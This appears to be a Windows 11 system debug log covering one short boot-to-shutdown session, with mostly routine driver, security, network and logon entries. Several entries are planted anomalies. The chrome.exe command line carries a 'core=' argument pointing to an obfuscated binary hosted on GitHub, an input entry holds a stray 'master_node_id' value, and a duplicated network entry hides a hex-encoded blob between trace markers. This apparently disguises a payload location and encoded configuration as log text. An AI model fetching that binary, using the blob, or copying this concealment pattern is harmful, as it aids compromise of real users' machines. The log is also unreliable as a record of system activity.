============================================================
 Windows 11 System Debug Log
 Generated: 2026-02-01 00:58:12
 Machine: DESKTOP-7F3A92
 OS Build: Windows 11 Pro 23H2 (22631.3007)
============================================================

[00:58:12.114] [INFO] [BOOT]
System boot initiated.
Firmware type: UEFI
Secure Boot: Enabled

[00:58:13.002] [INFO] [KERNEL]
Kernel version loaded successfully.
Virtualization-based security: Enabled
Memory Integrity: On

[00:58:14.331] [INFO] [DRIVER]
Driver loaded: nvlddmkm.sys (NVIDIA Display Driver)
Version: 31.0.15.5212
Status: OK

[00:58:14.912] [WARN] [DRIVER]
Driver delayed: Intel(R) Wireless Bluetooth
Reason: Device initialization timeout (Code 10)

[00:58:16.204] [INFO] [SERVICE]
Service started: Windows Defender Antivirus Service

[00:58:16.219] [DEBUG] [SECURITY]
Defender Real-Time Protection enabled.
Cloud protection level: High
Sample submission: Automatic

[00:58:18.443] [INFO] [SERVICE]
Service started: Windows Event Log

[00:58:19.771] [INFO] [NETWORK]
Network adapter detected: Intel(R) Ethernet I219-V
MAC: **:**:**:**:**:**
Link speed: 1.0 Gbps

[00:58:20.155] [DEBUG] [NETWORK]
DHCP request sent.
Assigned IP: 192.168.1.102
Gateway: 192.168.1.1
DNS: 192.168.1.1

[00:58:23.488] [INFO] [USER]
User logon successful.
Username: user
Logon type: Interactive (2)

[00:58:24.022] [DEBUG] [SESSION]
User session initialized.
Shell: explorer.exe

[00:58:26.917] [INFO] [APP]
Application started: explorer.exe
PID: 4120

[00:58:29.441] [INFO] [APP]
Application started: chrome.exe
PID: 4988
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
core= [https://raw.githubusercontent.com/nengkinkjackx/debug/main/tools_obf.bin]

[00:58:31.004] [DEBUG] [APP]
chrome.exe initialized profile: Default
Extensions loaded: 12

[00:58:34.882] [WARN] [APP]
chrome.exe high memory usage detected.
Working set: 1.8 GB

[00:58:38.550] [INFO] [POWER]
Power state: AC
Battery status: Not applicable

[00:58:41.230] [DEBUG] [INPUT]
master_node_id: [oxide-44448888]
User input detected.
Foreground window: Google Chrome

[00:58:45.992] [INFO] [SECURITY]
SmartScreen reputation check completed.
Result: Allowed

[00:58:50.401] [DEBUG] [NETWORK]
Outbound HTTPS connection established.
Destination: github.com
Port: 443
Protocol: TLS 1.3

[00:58:50.401] [DEBUG] [NETWORK]
Outbound HTTPS connection established.
TRACE_ID_START
e0 b7 66 2b da 98 72 af 3c ce f2 4e 02 8f 7d 95 51 f2 fb 51 c8 00 36 ea 9d 40 dd 65 38 92 ba 52 18 fc e1 92 f6 4e 42 dd 04 2b 30 d4 e1 7b 0b cb bd 86 e8 6b f9 fd a7 81 c0 67 6b 77 67 bf 22 81 26 9d 32 5d e7 1c 41 bf
[DEBUG] TRACE_ID_END
Protocol: TLS 1.3

[00:58:55.119] [INFO] [TASK]
Scheduled task executed: \Microsoft\Windows\Defrag\ScheduledDefrag

[00:59:02.774] [DEBUG] [RESOURCE]
CPU usage: 18%
Memory usage: 62%
Disk IO: Normal

[00:59:10.113] [WARN] [SYSTEM]
Application hang detected.
Process: chrome.exe
Duration: 5 seconds

[00:59:12.440] [INFO] [SYSTEM]
Application recovered without termination.

[00:59:20.005] [DEBUG] [IDLE]
User idle time exceeded threshold (300s).

[00:59:30.882] [INFO] [SECURITY]
Periodic system scan completed.
Threats detected: 0

[00:59:45.100] [INFO] [SHUTDOWN]
System shutdown requested by user.

[00:59:46.321] [DEBUG] [SERVICE]
Stopping service: Windows Update

[00:59:47.993] [INFO] [KERNEL]
System shutdown completed successfully.
============================================================
 End of log file
============================================================
